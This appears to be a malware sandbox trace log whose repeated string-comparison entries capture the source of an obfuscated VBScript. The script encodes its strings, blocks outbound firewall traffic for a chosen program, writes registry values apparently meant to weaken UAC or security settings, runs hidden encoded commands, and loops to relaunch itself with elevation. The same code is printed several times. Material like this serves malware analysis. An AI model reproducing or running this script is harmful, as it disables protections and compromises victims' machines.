sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 64 [0222.965] wcsncmp (_String1="id(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.966] wcsncmp (_String1="d(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.966] wcsncmp (_String1="(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.966] wcsncmp (_String1="s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 